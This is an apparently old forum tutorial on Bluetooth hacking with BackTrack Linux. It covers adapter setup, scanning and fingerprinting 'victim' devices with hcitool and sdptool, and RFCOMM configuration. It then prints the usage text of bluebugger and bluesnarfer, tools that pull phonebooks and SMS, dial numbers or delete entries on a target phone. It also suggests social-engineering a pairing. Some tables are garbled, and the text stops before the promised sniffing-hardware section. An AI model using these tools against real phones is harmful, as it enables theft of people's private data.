Backtrack Ultimate Bluetooth Tutorial

Hey all
After I received lots of mail and requests I decided to shed some more light on
bluetooth. In this tutorial I am going to be covering the following subjects...
1)
2)
3)
4)

Setting up your bluetooth equipment

Scanning and fingerprinting devices
Connectivity and RFCOMM
Bluebugging & Bluesnarfing

And as a merry Christmas to all at remote exploits

5) Making bluetooth sniffing hardware for $39.99
Video tutorials on different subjects will be added to this post over the next w
eek.
OK lets begin the first subject might sound silly to most here but for the guys
that just don't know I'm going to cover it anyway. To setup your bluetooth USB d
evice simply plug it in and wait for 10 sec's. Then type in console
Code:
hciconfig hci0 up
And you should have your adapter up and working, you can test with the following
command .....
Code:
hciconfig -a
And you should see something like the following .
Code:
hci0:

Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

Ok if you are stuck at this point I would suggest you go out and buy a compatibl
e USB dongle for backtrack But if you are still with me lets move on.
Next is fingerprinting a bluetooth device. Fingerprinting is a term we use for p
rofiling a device, and to do this backtrack has a collection of tools called blu
ez. Bluez is like the standard bluetooth package for linux. For fingerprinting w

e can use a couple of those tools. One is hcitool, we can use hcitool to scan fo
r devices that are broadcasting. We scan with hcitool with the following command
.
Code:
hcitool scan hci0
And you should see something like ...
Code:
Scanning ...
00:11:22:33:44:55

hackme

You can also brute force scan for devices, backtrack also has you covered on thi
s with a wonderful tool called btscanner. Btscanner can also inquiry scan You wo
uld use btscanner in a inquiry scan if you were wardriving.
The other is Sdptool, sdptool will browse our device for open channels and tell
us what services are available on what channels.
We fingerprint devices with sdptool by issuing the following command
Code:
sdptool browse victim_Mac
And you should see something like this .........
Code:
Service Name: Serial Port
Service RecHandle: 0x10001
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100
Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100
Service
Service
Service
"OBEX

Name: OBEX File Transfer

RecHandle: 0x10007
Class ID List:
File Transfer" (0x1106)

Protocol Descriptor List:

"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100
Service Name: Object Push
Service RecHandle: 0x10008
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
Lets take a look at what we have, on two we have a serial port/channel on three
we have dial up on 6 we have OBEX ftp and on 7 we have OPUSH.
All are interesting And no we have a pretty good idea about what the device is a
nd so on.
Now on to the bit most people I speak to struggle with the dreaded RFCOMM :O. RF
COMM is a simple set of transport protocols, made on top of the L2CAP protocol,
providing emulated RS-232 serial port. or in lamens terms they provide the langu
age your device and laptop need to talk to each other.
Now the first thing to do is to setup our bluetooth configuration so lets go ove
r to the /etc dir and get stuck in.
open /etc/bluetooth/hcid.conf and replace the lot with this
Code:
#
# HCI daemon configuration file.
#
# HCId options
options {
# Automatically initialize new devices
autoinit yes;
# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;
# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts

pairing multi;
# Default PIN code for incoming connections
passkey "1234";
}
# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";
# Local device class
class 0x000000;
# Default packet type
#pkt_type DH1,DM1,HV1;
# Inquiry and Page scan
iscan enable; pscan enable;
# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
#
deny role switch on outgoing connections
lm accept,master;
# Default link policy
# none
- no specific policy
# rswitch - allow role switch
# hold
- allow hold mode
# sniff - allow sniff mode
# park
- allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
You can setup your own passkey and name, also go over to a shell and type
Code:
hciconfig -a
And copy the class to hcid.conf, save and exit. You could setup rfcomm here to b
ut its a live cd.
Now restart your bluetooth device like so
Code:
bash /etc/rc.d/rc.bluetooth restart
And now we can setup our rfcomm binds, I will post a bash script when I have tim
e but for now you will have to do it the manual way .
First thing is to setup our devices .....

Code:
mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7
Ok what we did there is create three binds to our bluetooth device. First one is
RFCOMM0 and is on channel 3 DUN Dial up, Second is RFCOMM1 and is on channel 6
FTP and the third is RFCOMM2 and is on channel 7 OBEX push.
Now lets connect it all up with sdptool.
Code:
sdptool add --channel=3 DUN
sdptool add --channel=6 FTP
sdptool add --channel=7 OPUSH
Now we have setup our bluetooth dongle correctly we can begin hacking
If I were to talk you though every possible exploit there is for bluetooth it wo
uld take all next year and I still wouldn't be finished so the two hack are goin
g to be bluesnarfer and bluebugger.
Bluesnarfer connects to a target Bluetooth device via Bluetooth's OBEX Push prof
ile. But instead of pushing a business card, it pulls, using a "get" request for
files with known names, such as the phonebook file (telecom/pb.vcf) or the cale
ndar file (telecom/cal.vcs), Bluebugger works in a similar way.
Also bear in mind that these security flaws can still be used against you. With
a little bit of social engineering you could pre pair a phone to your laptop and
exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugge
r successfully completing a hack on my samsung d600.
Both are pretty strait forward to use now you have your bluetooth setup correctl
y. I'm not going to post commands because their is a video on the way. First blu
ebugger....
Code:
bluebugger 0.1 ( MaJoMu | www.codito.de )
----------------------------------------Usage: bluebugger [OPTIONS] -a <addr> [MODE]
-a <addr>

= Bluetooth address of target

Options:
--------m <name>
-d <device>
-c <channel>
-n
-t <timeout>
-o <file>

=
=
=
=
=
=

Mode:
----info
phonebook
messages

Name to use when connecting (default: '')

Device to use (default: '/dev/rfcomm')
Channelto use (default: 17)
No device name lookup
Timeout in seconds for name lookup (default: 5)
Write output to <file>

= Read Phone Info (default)

= Read Phonebook
(default)
= Read SMS Messages (default)

dial <num>
ATCMD

= Dial number
= Custom Command (e.g. '+GMI')

Note: Modes can be combined, e.g. 'info phonebook +GMI'

And Bluesnarfer ......
Code:
bluesnarfer, version 0.1 usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD

: valid AT+CMD (GSM EXTENSION)

TYPE
example

: valid phonebook type ..

: "DC" (dialed call list)
"SM" (SIM phonebook)
"RC" (recevied call list)
"XX" much more

-b bdaddr : bluetooth device address

-C chan : bluetooth rfcomm channel
-c
-r
-w
-f
-s
-l
-i

ATCMD
N-M
N-M
name
TYPE

:
:
:
:
:
:
:

custom action
read phonebook entry N to M
delete phonebook entry N to M
search "name" in phonebook address
select phonebook memory storage
list aviable phonebook memory storage
device info

Now for the finally how to turn an ordinary USB bluetooth dongle into a $1000 do
llar sniffing tool